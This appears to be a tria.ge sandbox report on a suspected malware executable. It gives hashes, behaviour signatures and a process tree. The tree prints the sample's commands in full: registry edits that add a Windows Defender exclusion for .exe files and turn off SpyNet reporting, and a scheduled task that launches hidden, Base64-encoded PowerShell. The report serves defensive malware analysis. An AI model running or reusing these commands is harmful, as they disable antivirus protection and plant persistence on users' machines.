Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    10s
  • max time network
    15s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231020-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/10/2023, 22:01

General

  • Target

    b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe

  • Size

    7.3MB

  • MD5

    aa1ea1ddc7e58eb23593b1a9a2bf1293

  • SHA1

    cfea2b88f2abc426ef066550817b1729295898f0

  • SHA256

    b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7

  • SHA512

    4a7ff88bded2cf2a095b6903c345076269f691ed82f4c8abd68c9c13159d22837f270c1dfb681af81e01750dc9f6083920595ef8a80de93d38b11d2a519b27fd

  • SSDEEP

    196608:91Ow47moHXAOm3vNPANBLr/8m2iXLcqsLfK3j:3ObmoHX5mNorr/Vuaz

Score
7/10

Malware Config

Signatures

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe
    "C:\Users\Admin\AppData\Local\Temp\b3e50dd808b24e03844d3b4d1a53c0c73401ef1a338388945c401e7545a66ec7.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3280
    • C:\Users\Admin\AppData\Local\Temp\7zS89F0.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1672
      • C:\Users\Admin\AppData\Local\Temp\7zS8ED2.tmp\Install.exe
        .\Install.exe /HdidY "385118" /S
        3⤵
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1956
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2684
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1168
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:4212
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:3736
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3924
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2864
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:704
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:4988
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gRDqhgJub" /SC once /ST 18:38:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:1684
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gRDqhgJub"
                  4⤵
                    PID:3196
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
              1⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4476

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\7zS89F0.tmp\Install.exe

              Filesize

              6.1MB

              MD5

              7a828b58479734ae420fecc12a00b474

              SHA1

              88d685d7de97ab4c1ef5c2524ab15d3a03c9eb36

              SHA256

              02080ebd09414905472e0f8c52c8b964bc578e72057ead60fdd44fa955e2ff4b

              SHA512

              c8a116cd359c8f5ba7dbe8341e34f217b7ce2079a34eeecb51c5352a9a0af6598ff55bf39c41b48d82909f0410baa4de9b84e848d11f0dd4dedb1f9ad48a3df5

            • C:\Users\Admin\AppData\Local\Temp\7zS89F0.tmp\Install.exe

              Filesize

              6.1MB

              MD5

              7a828b58479734ae420fecc12a00b474

              SHA1

              88d685d7de97ab4c1ef5c2524ab15d3a03c9eb36

              SHA256

              02080ebd09414905472e0f8c52c8b964bc578e72057ead60fdd44fa955e2ff4b

              SHA512

              c8a116cd359c8f5ba7dbe8341e34f217b7ce2079a34eeecb51c5352a9a0af6598ff55bf39c41b48d82909f0410baa4de9b84e848d11f0dd4dedb1f9ad48a3df5

            • C:\Users\Admin\AppData\Local\Temp\7zS8ED2.tmp\Install.exe

              Filesize

              6.8MB

              MD5

              5ea24b94d60ba9cc83b4832930d4a193

              SHA1

              669e5df0dfae166acb9b6714b845ebf5b52b8a44

              SHA256

              6feb6821d956a8d128d74d814d833900b5b9d41b3fa001d3b47556ab8119b236

              SHA512

              61b8bd7ffca87241e55bfbbea5471a53355b332339c6a62593fb6c0632e42e61d1fce4c6294e08c5ac69e31b8a2f7e01d1bff22097f5b2942c5f948579489516

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qlvscx5w.lg4.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • memory/1956-11-0x00000000004D0000-0x0000000000BA3000-memory.dmp

              Filesize

              6.8MB

            • memory/1956-12-0x0000000010000000-0x0000000010570000-memory.dmp

              Filesize

              5.4MB

            • memory/4476-22-0x00007FFFCC1C0000-0x00007FFFCCC81000-memory.dmp

              Filesize

              10.8MB

            • memory/4476-23-0x00000183FAF10000-0x00000183FAF20000-memory.dmp

              Filesize

              64KB

            • memory/4476-24-0x00000183FAF10000-0x00000183FAF20000-memory.dmp

              Filesize

              64KB

            • memory/4476-28-0x00000183FD250000-0x00000183FD272000-memory.dmp

              Filesize

              136KB